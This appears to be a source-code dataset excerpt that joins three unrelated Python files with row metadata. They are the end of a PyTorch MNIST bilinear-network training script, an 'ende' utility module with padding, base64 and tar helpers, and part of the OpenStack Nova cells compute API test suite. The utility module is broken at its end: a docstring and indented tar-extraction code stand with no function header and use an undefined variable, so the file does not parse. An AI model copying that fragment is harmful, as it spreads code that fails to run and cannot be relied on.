    checkpoint = torch.load("./checkpoints/" + MODEL_SAVE_FILE)
    net = checkpoint["net"]
    best_acc = checkpoint["acc"]
    start_epoch = checkpoint["epoch"]
    optimizer = checkpoint["optimizer"]
else:
    print("==> Building model...")
    net = bilinearNet(num_classes=NUM_CLASSES)
# print(torch_summarize(net))
# print(net)
if USE_GPU:
    net.cuda()
    cudnn.benchmark = True

# Append-mode training log: "<epoch> <train_acc> <test_acc> <test_loss>".
log = open("./log/%s.txt" % MODEL_NAME, 'a')

print("==> Preparing data...")
kwargs = {'num_workers': 2, 'pin_memory': True} if USE_GPU else {}
# Standard MNIST normalization constants (mean 0.1307, std 0.3081).
train_loader = torch.utils.data.DataLoader(
    datasets.MNIST(DATA_DIR, train=True, download=True,
                   transform=transforms.Compose([
                       transforms.ToTensor(),
                       transforms.Normalize((0.1307,), (0.3081,))
                   ])),
    batch_size=BATCH_SIZE, shuffle=True, **kwargs)
test_loader = torch.utils.data.DataLoader(
    datasets.MNIST(DATA_DIR, train=False, transform=transforms.Compose([
        transforms.ToTensor(),
        transforms.Normalize((0.1307,), (0.3081,))
    ])),
    batch_size=BATCH_SIZE, shuffle=True, **kwargs)

optimizer = optim.Adam(net.parameters())
criterion = nn.CrossEntropyLoss()
def train(epoch, net, optimizer):
    """Run one training epoch over train_loader and log train accuracy.

    Uses the module-level train_loader, criterion, log and USE_GPU;
    writes "<epoch> <train_acc> " to the log file (no newline — test()
    completes the line).
    """
    print("\nEpoch: %d" % epoch)
    net.train()
    running_loss, n_correct, n_seen = 0, 0, 0
    # optimizer = lr_scheduler(optimizer, epoch, init_lr=0.002, decay_epoch=start_epoch)
    for step, (images, labels) in enumerate(train_loader):
        if USE_GPU:
            images, labels = images.cuda(), labels.cuda()
        images, labels = Variable(images), Variable(labels)
        optimizer.zero_grad()
        logits = net(images)
        batch_loss = criterion(logits, labels)
        batch_loss.backward()
        optimizer.step()
        running_loss += batch_loss.data[0]
        predictions = torch.max(logits.data, 1)[1]
        n_seen += labels.size(0)
        n_correct += predictions.eq(labels.data).cpu().sum()
        progress_bar(step, len(train_loader), "Loss: %.3f | Acc: %.3f%% (%d/%d)"
                     % (running_loss / (step + 1), 100. * n_correct / n_seen, n_correct, n_seen))
    log.write(str(epoch) + ' ' + str(n_correct / n_seen) + ' ')
def test(epoch, net):
    """Evaluate *net* on test_loader; checkpoint when accuracy improves.

    Writes "<test_acc> <total_test_loss>\\n" to the log file, and saves a
    checkpoint (net, acc, epoch, optimizer) once epoch > 9 whenever the
    accuracy beats the best seen so far.
    """
    global best_acc
    net.eval()
    test_loss, correct, total = 0, 0, 0
    for batch_idx, (inputs, targets) in enumerate(test_loader):
        if USE_GPU:
            inputs, targets = inputs.cuda(), targets.cuda()
        inputs, targets = Variable(inputs, volatile=True), Variable(targets)
        out = net(inputs)
        loss = criterion(out, targets)
        # BUG FIX: accumulate the per-batch loss. The original assigned
        # (test_loss = loss.data[0]) yet divided by (batch_idx + 1) in the
        # progress bar, so the displayed "average" loss was just the last
        # batch's loss shrunk by the batch count, and the logged value was
        # only the final batch's loss.
        test_loss += loss.data[0]
        _, predicted = torch.max(out.data, 1)
        total += targets.size(0)
        correct += predicted.eq(targets.data).cpu().sum()
        acc = 100. * correct / total
        progress_bar(batch_idx, len(test_loader), 'Loss: %.3f | Acc: %.3f%% (%d/%d)'
                     % (test_loss / (batch_idx + 1), acc, correct, total))
    log.write(str(correct / total) + ' ' + str(test_loss) + '\n')
    log.flush()
    acc = 100. * correct / total
    if epoch > 9 and acc > best_acc:
        print("Saving checkpoint")
        state = {
            'net': net,
            'acc': acc,
            'epoch': epoch,
            'optimizer': optimizer
        }
        if not os.path.isdir("checkpoints"):
            os.mkdir('checkpoints')
        torch.save(state, "./checkpoints/" + MODEL_SAVE_FILE)
        best_acc = acc
# Stage 1: freeze the backbone and train only the bilinear head with Adam.
for param in net.parameters():
    param.requires_grad = False
optim_params = list(net.bilinear1.parameters())
for param in optim_params:
    param.requires_grad = True
epoch1 = 8
# optimizer = optim.Adagrad(optim_params, lr=0.001, weight_decay=0.005)
optimizer = optim.Adam(optim_params, weight_decay=0.0005)
if start_epoch < epoch1:
    for epoch in range(start_epoch, epoch1):
        train(epoch, net, optimizer)
        test(epoch, net)
# BUG FIX: the original did "start_epoch = epoch1" unconditionally, so a
# run resumed from a checkpoint past epoch 8 was rewound to epoch 8 and
# retrained epochs it had already completed.
start_epoch = max(start_epoch, epoch1)
# Stage 2: unfreeze everything and fine-tune the whole network with SGD.
for param in net.parameters():
    param.requires_grad = True
optim_params = list(net.parameters())
# fc_params = list(map(id, net.fc2.parameters()))
# base_params = list(filter(lambda p: id(p) not in fc_params, net.parameters()))
optimizer = optim.SGD(optim_params, lr=0.0001, weight_decay=0.0005)
# optimizer = optim.Adagrad(optim_params, lr=0.001, weight_decay=0.0005)
for epoch in range(start_epoch, 200):
    train(epoch, net, optimizer)
    test(epoch, net)
log.close()
| 32.258621 | 104 | 0.64796 |
f6e519f319356b5efa69a9093179070fdbf64855 | 1,797 | py | Python | ende/Util.py | tmthydvnprt/ende | 7f487c994f670f02174b6fdffbcf59e461329d7f | [
"MIT"
] | null | null | null | ende/Util.py | tmthydvnprt/ende | 7f487c994f670f02174b6fdffbcf59e461329d7f | [
"MIT"
] | null | null | null | ende/Util.py | tmthydvnprt/ende | 7f487c994f670f02174b6fdffbcf59e461329d7f | [
"MIT"
] | null | null | null | """
ende.Util - Random utility functions
project : Ende
version : 0.1.0
status : development
modifydate : 2015-05-06 19:30:00 -0700
createdate : 2015-05-04 06:08:00 -0700
website : https://github.com/tmthydvnprt/ende
author : tmthydvnprt
email : tmthydvnprt@users.noreply.github.com
maintainer : tmthydvnprt
license : MIT
copyright : Copyright 2015, project
credits :
"""
# external dependancies
from math import ceil
import os
import tarfile
class EndeError(Exception):
    """Base exception type raised by the ende package."""
def str2ord(string):
    """Return the ord() code point of each character of *string* as a list."""
    return list(map(ord, string))
def str_sum(string):
    """Return the sum of the code points of every character of *string*."""
    return sum(ord(ch) for ch in string)
def pad(message='', block_size=16):
    """Return *message* PKCS#7-style padded up to a multiple of *block_size*.

    The pad character is chr(pad_size); a message already on a block
    boundary gains a full block of padding, so unpad() is always safe.
    """
    remainder = len(message) % block_size
    fill = block_size - remainder
    return message + chr(fill) * fill
def unpad(message=''):
    """Return *message* with its padding removed.

    Assumes chr(pad_size) * pad_size style padding (as produced by pad()).
    BUG FIX: an empty message now returns '' instead of raising
    IndexError on message[-1].
    """
    if not message:
        return message
    return message[:-ord(message[-1])]
def b64len(num=1):
    """Return the base64-encoded length of *num* bytes: 4 * ceil(num / 3).

    BUG FIX: uses integer arithmetic instead of the original
    int(4 * ceil(num / 3)); the float division num / 3 loses precision
    for num larger than ~2**53 and could return a wrong length.
    """
    return 4 * ((num + 2) // 3)
def ellipsis_truncate(message='', length=16):
    """Truncate *message* to *length* chars, appending '...' if it was longer."""
    head = message[:length]
    if len(message) > length:
        return head + '...'
    return head
def make_tar(output, sources):
    """Bundle *sources* into an uncompressed tar at *output*.

    Each entry is stored under its basename only, so directory structure
    is flattened inside the archive.
    """
    with tarfile.open(output, 'w') as archive:
        for path in sources:
            archive.add(path, arcname=os.path.basename(path))
"""open tar file"""
tar = tarfile.open(source, 'r')
tar.extractall()
tar.close()
| 24.283784 | 95 | 0.662215 |
e39f02bbf894512b5e64d8c7e5afd6328b5d574c | 33,035 | py | Python | nova/tests/unit/compute/test_compute_cells.py | adanin/nova | 1f74441680b4376cd401ecc0b0449b464cf7a5fb | [
"Apache-2.0"
] | 1 | 2019-04-22T06:25:26.000Z | 2019-04-22T06:25:26.000Z | nova/tests/unit/compute/test_compute_cells.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | null | null | null | nova/tests/unit/compute/test_compute_cells.py | woraser/nova | fc3890667e4971e3f0f35ac921c2a6c25f72adec | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2012 Rackspace Hosting
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests For Compute w/ Cells
"""
import copy
import functools
import inspect
import ddt
import mock
from oslo_utils.fixture import uuidsentinel as uuids
from oslo_utils import timeutils
from nova import block_device
from nova.cells import manager
from nova.compute import api as compute_api
from nova.compute import cells_api as compute_cells_api
from nova.compute import flavors
from nova.compute import power_state
from nova.compute import utils as compute_utils
from nova.compute import vm_states
from nova import context
from nova.db import api as db
from nova.db.sqlalchemy import api as db_api
from nova.db.sqlalchemy import api_models
from nova import exception
from nova import objects
from nova.objects import fields as obj_fields
from nova import quota
from nova import test
from nova.tests.unit.compute import test_compute
from nova.tests.unit.compute import test_shelve
from nova.tests.unit import fake_instance
from nova.tests.unit.objects import test_flavor
# The real (non-cells) compute API, captured by each TestCase.setUp so the
# cell stubs below can forward to it; restored in tearDown.
ORIG_COMPUTE_API = None
FAKE_IMAGE_REF = uuids.image_ref
# Fake hypervisor node names used by the resize/evacuate tests.
NODENAME = 'fakenode1'
NODENAME2 = 'fakenode2'
def stub_call_to_cells(context, instance, method, *args, **kwargs):
    """Stand-in for ComputeCellsAPI._call_to_cells.

    Runs the original (non-cells) compute API *method* locally and
    returns its result, after restoring the instance's pre-cast state in
    the "child cell" DB and temporarily swapping in the NoopQuotaDriver,
    mimicking what a child cell would do.
    """
    fn = getattr(ORIG_COMPUTE_API, method)
    original_instance = kwargs.pop('original_instance', None)
    if original_instance:
        instance = original_instance
        # Restore this in 'child cell DB'
        db.instance_update(context, instance['uuid'],
                           dict(vm_state=instance['vm_state'],
                                task_state=instance['task_state']))

    # Use NoopQuotaDriver in child cells.
    saved_quotas = quota.QUOTAS
    quota.QUOTAS = quota.QuotaEngine(
        quota_driver=quota.NoopQuotaDriver())
    compute_api.QUOTAS = quota.QUOTAS
    try:
        return fn(context, instance, *args, **kwargs)
    finally:
        # Always restore the real quota engine for the API cell.
        quota.QUOTAS = saved_quotas
        compute_api.QUOTAS = saved_quotas
def stub_cast_to_cells(context, instance, method, *args, **kwargs):
    """Stand-in for ComputeCellsAPI._cast_to_cells.

    Identical to stub_call_to_cells except the method's return value is
    discarded, matching cast (fire-and-forget) semantics.
    """
    fn = getattr(ORIG_COMPUTE_API, method)
    original_instance = kwargs.pop('original_instance', None)
    if original_instance:
        instance = original_instance
        # Restore this in 'child cell DB'
        db.instance_update(context, instance['uuid'],
                           dict(vm_state=instance['vm_state'],
                                task_state=instance['task_state']))

    # Use NoopQuotaDriver in child cells.
    saved_quotas = quota.QUOTAS
    quota.QUOTAS = quota.QuotaEngine(
        quota_driver=quota.NoopQuotaDriver())
    compute_api.QUOTAS = quota.QUOTAS
    try:
        fn(context, instance, *args, **kwargs)
    finally:
        # Always restore the real quota engine for the API cell.
        quota.QUOTAS = saved_quotas
        compute_api.QUOTAS = saved_quotas
def deploy_stubs(stubs, api, original_instance=None):
    """Wire *api*'s cell call/cast entry points to the local stub functions.

    When *original_instance* is given, it is threaded through to the
    stubs so they can restore pre-cast instance state in the child DB.
    """
    if original_instance:
        call = functools.partial(stub_call_to_cells,
                                 original_instance=original_instance)
        cast = functools.partial(stub_cast_to_cells,
                                 original_instance=original_instance)
    else:
        call = stub_call_to_cells
        cast = stub_cast_to_cells
    stubs.Set(api, '_call_to_cells', call)
    stubs.Set(api, '_cast_to_cells', cast)
@ddt.ddt
class CellsComputeAPITestCase(test_compute.ComputeAPITestCase):
    """Re-run the base compute API test suite against ComputeCellsAPI.

    setUp swaps in the cells-aware compute API and wires its
    call/cast-to-cells entry points to the local stubs (deploy_stubs);
    base tests that cannot work through the cells indirection are
    overridden here with skips.
    """

    def setUp(self):
        self.flags(use_neutron=False)
        super(CellsComputeAPITestCase, self).setUp()
        global ORIG_COMPUTE_API
        ORIG_COMPUTE_API = self.compute_api
        self.flags(enable=True, group='cells')

        def _fake_validate_cell(*args, **kwargs):
            return

        self.compute_api = compute_cells_api.ComputeCellsAPI()
        self.stubs.Set(self.compute_api, '_validate_cell',
                       _fake_validate_cell)
        deploy_stubs(self.stubs, self.compute_api)

    def tearDown(self):
        # Restore the plain compute API captured in setUp.
        global ORIG_COMPUTE_API
        self.compute_api = ORIG_COMPUTE_API
        super(CellsComputeAPITestCase, self).tearDown()

    def test_instance_metadata(self):
        self.skipTest("Test is incompatible with cells.")

    def _test_evacuate(self, force=None):
        # Overrides the base helper: with cells the host is prefixed with
        # the cell name, which must be stripped before the real evacuate.
        @mock.patch.object(compute_api.API, 'evacuate')
        def _test(mock_evacuate):
            instance = objects.Instance(uuid=uuids.evacuate_instance,
                                        cell_name='fake_cell_name')
            dest_host = 'fake_cell_name@fakenode2'
            self.compute_api.evacuate(self.context, instance, host=dest_host,
                                      force=force)
            mock_evacuate.assert_called_once_with(
                self.context, instance, 'fakenode2', force=force)

        _test()

    def test_error_evacuate(self):
        self.skipTest("Test is incompatible with cells.")

    def test_create_instance_sets_system_metadata(self):
        self.skipTest("Test is incompatible with cells.")

    def test_create_saves_flavor(self):
        self.skipTest("Test is incompatible with cells.")

    def test_create_instance_associates_security_groups(self):
        self.skipTest("Test is incompatible with cells.")

    @mock.patch('nova.objects.quotas.Quotas.check_deltas')
    def test_create_instance_over_quota_during_recheck(
            self, check_deltas_mock):
        self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
                      self.fake_show)
        # Simulate a race where the first check passes and the recheck fails.
        fake_quotas = {'instances': 5, 'cores': 10, 'ram': 4096}
        fake_headroom = {'instances': 5, 'cores': 10, 'ram': 4096}
        fake_usages = {'instances': 5, 'cores': 10, 'ram': 4096}
        exc = exception.OverQuota(overs=['instances'], quotas=fake_quotas,
                                  headroom=fake_headroom, usages=fake_usages)
        check_deltas_mock.side_effect = [None, exc]

        inst_type = flavors.get_default_flavor()
        # Try to create 3 instances.
        self.assertRaises(exception.QuotaError, self.compute_api.create,
            self.context, inst_type, self.fake_image['id'], min_count=3)

        project_id = self.context.project_id

        self.assertEqual(2, check_deltas_mock.call_count)
        call1 = mock.call(self.context,
                          {'instances': 3, 'cores': inst_type.vcpus * 3,
                           'ram': inst_type.memory_mb * 3},
                          project_id, user_id=None,
                          check_project_id=project_id, check_user_id=None)
        call2 = mock.call(self.context, {'instances': 0, 'cores': 0, 'ram': 0},
                          project_id, user_id=None,
                          check_project_id=project_id, check_user_id=None)
        check_deltas_mock.assert_has_calls([call1, call2])

        # Verify we removed the artifacts that were added after the first
        # quota check passed.
        instances = objects.InstanceList.get_all(self.context)
        self.assertEqual(0, len(instances))
        build_requests = objects.BuildRequestList.get_all(self.context)
        self.assertEqual(0, len(build_requests))

        @db_api.api_context_manager.reader
        def request_spec_get_all(context):
            return context.session.query(api_models.RequestSpec).all()

        request_specs = request_spec_get_all(self.context)
        self.assertEqual(0, len(request_specs))

        instance_mappings = objects.InstanceMappingList.get_by_project_id(
            self.context, project_id)
        self.assertEqual(0, len(instance_mappings))

    @mock.patch('nova.objects.quotas.Quotas.check_deltas')
    def test_create_instance_no_quota_recheck(
            self, check_deltas_mock):
        self.stub_out('nova.tests.unit.image.fake._FakeImageService.show',
                      self.fake_show)
        # Disable recheck_quota.
        self.flags(recheck_quota=False, group='quota')

        inst_type = flavors.get_default_flavor()
        (refs, resv_id) = self.compute_api.create(self.context,
                                                  inst_type,
                                                  self.fake_image['id'])
        self.assertEqual(1, len(refs))

        project_id = self.context.project_id

        # check_deltas should have been called only once.
        check_deltas_mock.assert_called_once_with(self.context,
                                                  {'instances': 1,
                                                   'cores': inst_type.vcpus,
                                                   'ram': inst_type.memory_mb},
                                                  project_id, user_id=None,
                                                  check_project_id=project_id,
                                                  check_user_id=None)

    @mock.patch.object(compute_api.API, '_local_delete')
    @mock.patch.object(compute_api.API, '_lookup_instance',
                       return_value=(None, None))
    def test_delete_instance_no_cell_instance_disappear(self, mock_lookup,
                                                        mock_local_delete):
        # Instance vanished between the delete request and the lookup:
        # only the delete-everywhere broadcast should happen.
        inst = self._create_fake_instance_obj()

        @mock.patch.object(self.compute_api.cells_rpcapi,
                           'instance_delete_everywhere')
        def test(mock_inst_del):
            self.compute_api.delete(self.context, inst)
            mock_lookup.assert_called_once_with(self.context, inst.uuid)
            mock_inst_del.assert_called_once_with(self.context, inst, 'hard')
            self.assertFalse(mock_local_delete.called)

        test()

    @mock.patch.object(compute_api.API, '_local_delete')
    def _test_delete_instance_no_cell(self, method_name, mock_local_delete):
        # Shared body for the soft/hard/force delete tests below.
        cells_rpcapi = self.compute_api.cells_rpcapi
        inst = self._create_fake_instance_obj()
        delete_type = method_name == 'soft_delete' and 'soft' or 'hard'

        @mock.patch.object(cells_rpcapi,
                           'instance_delete_everywhere')
        @mock.patch.object(compute_api.API, '_lookup_instance',
                           return_value=(None, inst))
        def test(mock_lookup, mock_inst_del):
            self.stub_out('nova.network.api.deallocate_for_instance',
                          lambda *a, **kw: None)
            getattr(self.compute_api, method_name)(self.context, inst)
            mock_lookup.assert_called_once_with(self.context, inst.uuid)
            mock_local_delete.assert_called_once_with(self.context, inst,
                                                      mock.ANY, method_name,
                                                      mock.ANY)
            mock_inst_del.assert_called_once_with(self.context,
                                                  inst, delete_type)

        test()

    def test_delete_instance_no_cell_constraint_failure_does_not_loop(self):
        inst = self._create_fake_instance_obj()
        inst.cell_name = None
        inst.destroy = mock.MagicMock()
        inst.destroy.side_effect = exception.ObjectActionError(action='',
                                                               reason='')
        inst.refresh = mock.MagicMock()

        @mock.patch.object(self.compute_api.cells_rpcapi,
                           'instance_delete_everywhere')
        @mock.patch.object(compute_api.API, '_lookup_instance',
                           return_value=(None, inst))
        @mock.patch.object(objects.InstanceMapping, 'get_by_instance_uuid')
        def _test(mock_get_im, _mock_lookup_inst, _mock_delete_everywhere):
            self.assertRaises(exception.ObjectActionError,
                              self.compute_api.delete, self.context, inst)
            inst.destroy.assert_called_once_with()
            mock_get_im.assert_called_once_with(self.context, inst.uuid)

        _test()

    def test_delete_instance_no_cell_constraint_failure_corrects_itself(self):

        def add_cell_name(context, instance, delete_type):
            # Simulates the broadcast racing in and assigning a cell.
            instance.cell_name = 'fake_cell_name'

        inst = self._create_fake_instance_obj()
        inst.cell_name = None
        inst.destroy = mock.MagicMock()
        inst.destroy.side_effect = exception.ObjectActionError(action='',
                                                               reason='')
        inst.refresh = mock.MagicMock()

        @mock.patch.object(compute_api.API, 'delete')
        @mock.patch.object(self.compute_api.cells_rpcapi,
                'instance_delete_everywhere', side_effect=add_cell_name)
        @mock.patch.object(compute_api.API, '_lookup_instance',
                           return_value=(None, inst))
        @mock.patch.object(objects.InstanceMapping, 'get_by_instance_uuid')
        def _test(mock_get_im, _mock_lookup_inst, mock_delete_everywhere,
                  mock_compute_delete):
            self.compute_api.delete(self.context, inst)
            inst.destroy.assert_called_once_with()

            mock_compute_delete.assert_called_once_with(self.context, inst)
            mock_get_im.assert_called_once_with(self.context, inst.uuid)

        _test()

    def test_delete_instance_no_cell_destroy_fails_already_deleted(self):
        # If the instance.destroy() is reached during _local_delete,
        # it will raise ObjectActionError if the instance has already
        # been deleted by a instance_destroy_at_top, and instance.refresh()
        # will raise InstanceNotFound
        instance = objects.Instance(context=self.context,
                                    uuid=uuids.destroy_instance,
                                    cell_name=None, host=None)
        actionerror = exception.ObjectActionError(action='destroy', reason='')
        notfound = exception.InstanceNotFound(instance_id=instance.uuid)

        @mock.patch.object(compute_api.API, 'delete')
        @mock.patch.object(self.compute_api.cells_rpcapi,
                           'instance_delete_everywhere')
        @mock.patch.object(compute_api.API, '_local_delete',
                           side_effect=actionerror)
        @mock.patch.object(instance, 'refresh', side_effect=notfound)
        @mock.patch.object(compute_api.API, '_lookup_instance',
                           return_value=(None, instance))
        def _test(_mock_lookup_instance, mock_refresh, mock_local_delete,
                  mock_delete_everywhere, mock_compute_delete):
            self.compute_api.delete(self.context, instance)
            mock_delete_everywhere.assert_called_once_with(self.context,
                                                           instance, 'hard')
            mock_local_delete.assert_called_once_with(self.context,
                    instance, mock.ANY, 'delete', self.compute_api._do_delete)
            mock_refresh.assert_called_once_with()
            self.assertFalse(mock_compute_delete.called)

        _test()

    def test_delete_instance_no_cell_instance_not_found_already_deleted(self):
        # If anything in _local_delete accesses the instance causing a db
        # lookup before instance.destroy() is reached, if the instance has
        # already been deleted by a instance_destroy_at_top,
        # InstanceNotFound will be raised
        instance = objects.Instance(context=self.context,
                                    uuid=uuids.delete_instance, cell_name=None,
                                    host=None)
        notfound = exception.InstanceNotFound(instance_id=instance.uuid)

        @mock.patch.object(compute_api.API, 'delete')
        @mock.patch.object(self.compute_api.cells_rpcapi,
                           'instance_delete_everywhere')
        @mock.patch.object(compute_api.API, '_lookup_instance',
                           return_value=(None, instance))
        @mock.patch.object(compute_api.API, '_local_delete',
                           side_effect=notfound)
        def _test(mock_local_delete, _mock_lookup, mock_delete_everywhere,
                  mock_compute_delete):
            self.compute_api.delete(self.context, instance)
            mock_delete_everywhere.assert_called_once_with(self.context,
                                                           instance, 'hard')
            mock_local_delete.assert_called_once_with(self.context,
                    instance, mock.ANY, 'delete', self.compute_api._do_delete)
            self.assertFalse(mock_compute_delete.called)

        _test()

    def test_soft_delete_instance_no_cell(self):
        self._test_delete_instance_no_cell('soft_delete')

    def test_delete_instance_no_cell(self):
        self._test_delete_instance_no_cell('delete')

    def test_force_delete_instance_no_cell(self):
        self._test_delete_instance_no_cell('force_delete')

    @mock.patch.object(compute_api.API, '_delete_while_booting',
                       side_effect=exception.ObjectActionError(
                           action='delete', reason='host now set'))
    @mock.patch.object(compute_api.API, '_local_delete')
    @mock.patch.object(compute_api.API, '_lookup_instance')
    @mock.patch.object(compute_api.API, 'delete')
    def test_delete_instance_no_cell_then_cell(self, mock_delete,
                                               mock_lookup_instance,
                                               mock_local_delete,
                                               mock_delete_while_booting):
        # This checks the case where initially an instance has no cell_name,
        # and therefore no host, set but instance.destroy fails because
        # there is now a host.
        instance = self._create_fake_instance_obj()
        instance_with_cell = copy.deepcopy(instance)
        instance_with_cell.cell_name = 'foo'
        mock_lookup_instance.return_value = None, instance_with_cell

        cells_rpcapi = self.compute_api.cells_rpcapi

        @mock.patch.object(cells_rpcapi, 'instance_delete_everywhere')
        def test(mock_inst_delete_everywhere):
            self.compute_api.delete(self.context, instance)
            mock_local_delete.assert_not_called()
            mock_delete.assert_called_once_with(self.context,
                                                instance_with_cell)

        test()

    @mock.patch.object(compute_api.API, '_delete_while_booting',
                       side_effect=exception.ObjectActionError(
                           action='delete', reason='host now set'))
    @mock.patch.object(compute_api.API, '_local_delete')
    @mock.patch.object(compute_api.API, '_lookup_instance')
    @mock.patch.object(compute_api.API, 'delete')
    def test_delete_instance_no_cell_then_no_instance(self,
            mock_delete, mock_lookup_instance, mock_local_delete,
            mock_delete_while_booting):
        # This checks the case where initially an instance has no cell_name,
        # and therefore no host, set but instance.destroy fails because
        # there is now a host. And then the instance can't be looked up.
        instance = self._create_fake_instance_obj()
        mock_lookup_instance.return_value = None, None

        cells_rpcapi = self.compute_api.cells_rpcapi

        @mock.patch.object(cells_rpcapi, 'instance_delete_everywhere')
        def test(mock_inst_delete_everywhere):
            self.compute_api.delete(self.context, instance)
            mock_local_delete.assert_not_called()
            mock_delete.assert_not_called()

        test()

    def test_get_migrations(self):
        filters = {'cell_name': 'ChildCell', 'status': 'confirmed'}
        migrations = {'migrations': [{'id': 1234}]}

        @mock.patch.object(self.compute_api.cells_rpcapi, 'get_migrations',
                           return_value=migrations)
        def test(mock_cell_get_migrations):
            response = self.compute_api.get_migrations(self.context,
                                                       filters)
            mock_cell_get_migrations.assert_called_once_with(self.context,
                                                             filters)
            self.assertEqual(migrations, response)

        test()

    def test_create_block_device_mapping(self):
        # With cells, BDM creation is deferred to the child cell, so the
        # API-cell call must not persist anything.
        instance_type = {'swap': 1, 'ephemeral_gb': 1}
        instance = self._create_fake_instance_obj()
        bdms = [block_device.BlockDeviceDict({'source_type': 'image',
                                              'destination_type': 'local',
                                              'image_id': uuids.image,
                                              'boot_index': 0})]
        self.compute_api._create_block_device_mapping(
            instance_type, instance.uuid, bdms)

        bdms = db.block_device_mapping_get_all_by_instance(
            self.context, instance['uuid'])
        self.assertEqual(0, len(bdms))

    def test_create_bdm_from_flavor(self):
        self.skipTest("Test is incompatible with cells.")

    @mock.patch('nova.cells.messaging._TargetedMessage')
    def test_rebuild_sig(self, mock_msg):
        # TODO(belliott) Cells could benefit from better testing to ensure API
        # and manager signatures stay up to date

        def wire(version):
            # wire the rpc cast directly to the manager method to make sure
            # the signature matches
            cells_mgr = manager.CellsManager()

            def cast(context, method, *args, **kwargs):
                fn = getattr(cells_mgr, method)
                fn(context, *args, **kwargs)

            cells_mgr.cast = cast
            return cells_mgr

        cells_rpcapi = self.compute_api.cells_rpcapi
        client = cells_rpcapi.client

        with mock.patch.object(client, 'prepare', side_effect=wire):
            inst = self._create_fake_instance_obj()
            inst.cell_name = 'mycell'
            cells_rpcapi.rebuild_instance(self.context, inst, 'pass', None,
                                          None, None, None, None,
                                          recreate=False,
                                          on_shared_storage=False, host='host',
                                          preserve_ephemeral=True, kwargs=None)

        # one targeted message should have been created
        self.assertEqual(1, mock_msg.call_count)

    def test_populate_instance_for_create(self):
        super(CellsComputeAPITestCase, self).test_populate_instance_for_create(
            num_instances=2)

    def test_multi_instance_display_name(self):
        super(CellsComputeAPITestCase,
              self).test_multi_instance_display_name(cells_enabled=True)

    @ddt.data(True, False)
    def test_rdp_console(self, enabled_consoleauth):
        self.skipTest("Removing cells v1")

    @ddt.data(True, False)
    def test_spice_console(self, enabled_consoleauth):
        self.skipTest("Removing cells v1")

    @ddt.data(True, False)
    def test_vnc_console(self, enabled_consoleauth):
        self.skipTest("Removing cells v1")
class CellsShelveComputeAPITestCase(test_shelve.ShelveComputeAPITestCase):
    """Run the shelve API tests through ComputeCellsAPI.

    Overrides instance creation to give every instance a cell_name, and
    checks that shelve/unshelve are cast down to the child cell instead
    of being executed locally.
    """

    def setUp(self):
        super(CellsShelveComputeAPITestCase, self).setUp()
        global ORIG_COMPUTE_API
        ORIG_COMPUTE_API = self.compute_api
        self.compute_api = compute_cells_api.ComputeCellsAPI()

        def _fake_validate_cell(*args, **kwargs):
            return

        self.stub_out('nova.compute.api.API._validate_cell',
                      _fake_validate_cell)

    def _create_fake_instance_obj(self, params=None, type_name='m1.tiny',
                                  services=False, context=None):
        """Build and persist a fake ACTIVE instance living in 'api!child'."""
        flavor = flavors.get_flavor_by_name(type_name)
        inst = objects.Instance(context=context or self.context)
        inst.cell_name = 'api!child'
        inst.vm_state = vm_states.ACTIVE
        inst.task_state = None
        inst.power_state = power_state.RUNNING
        inst.image_ref = FAKE_IMAGE_REF
        inst.reservation_id = 'r-fakeres'
        inst.user_id = self.user_id
        inst.project_id = self.project_id
        inst.host = self.compute.host
        inst.node = NODENAME
        inst.instance_type_id = flavor.id
        inst.ami_launch_index = 0
        inst.memory_mb = 0
        inst.vcpus = 0
        inst.root_gb = 0
        inst.ephemeral_gb = 0
        inst.architecture = obj_fields.Architecture.X86_64
        inst.os_type = 'Linux'
        inst.system_metadata = (
            params and params.get('system_metadata', {}) or {})
        inst.locked = False
        inst.created_at = timeutils.utcnow()
        inst.updated_at = timeutils.utcnow()
        inst.launched_at = timeutils.utcnow()
        inst.security_groups = objects.SecurityGroupList(objects=[])
        inst.flavor = flavor
        inst.old_flavor = None
        inst.new_flavor = None
        if params:
            inst.flavor.update(params.pop('flavor', {}))
            inst.update(params)
        inst.create()
        return inst

    def _test_shelve(self, vm_state=vm_states.ACTIVE,
                     boot_from_volume=False, clean_shutdown=True):
        # With cells, shelve must be cast down to the child cell.
        params = dict(task_state=None, vm_state=vm_state,
                      display_name='fake-name')
        instance = self._create_fake_instance_obj(params=params)
        with mock.patch.object(self.compute_api,
                               '_cast_to_cells') as cast_to_cells:
            self.compute_api.shelve(self.context, instance,
                                    clean_shutdown=clean_shutdown)
            cast_to_cells.assert_called_once_with(self.context,
                                                  instance, 'shelve',
                                                  clean_shutdown=clean_shutdown
                                                  )

    def test_unshelve(self):
        # Ensure instance can be unshelved on cell environment.
        # The super class tests nova-shelve.
        instance = self._create_fake_instance_obj()

        self.assertIsNone(instance['task_state'])

        self.compute_api.shelve(self.context, instance)

        instance.task_state = None
        instance.vm_state = vm_states.SHELVED
        instance.save()

        with mock.patch.object(self.compute_api,
                               '_cast_to_cells') as cast_to_cells:
            self.compute_api.unshelve(self.context, instance)
            cast_to_cells.assert_called_once_with(self.context,
                                                  instance, 'unshelve')

    def tearDown(self):
        # Restore the plain compute API captured in setUp.
        global ORIG_COMPUTE_API
        self.compute_api = ORIG_COMPUTE_API
        super(CellsShelveComputeAPITestCase, self).tearDown()
class CellsConductorAPIRPCRedirect(test.NoDBTestCase):
    def setUp(self):
        super(CellsConductorAPIRPCRedirect, self).setUp()

        self.compute_api = compute_cells_api.ComputeCellsAPI()
        # Replace the conductor task API's cells RPC client with a mock so
        # each test can assert the compute call was redirected via cells.
        self.cells_rpcapi = mock.MagicMock()
        self.compute_api.compute_task_api.cells_rpcapi = self.cells_rpcapi

        self.context = context.RequestContext('fake', 'fake')
    @mock.patch.object(compute_api.API, '_record_action_start')
    @mock.patch.object(compute_api.API, '_provision_instances')
    @mock.patch.object(compute_api.API, '_check_and_transform_bdm')
    @mock.patch.object(compute_api.API, '_get_image')
    @mock.patch.object(compute_api.API, '_validate_and_build_base_options')
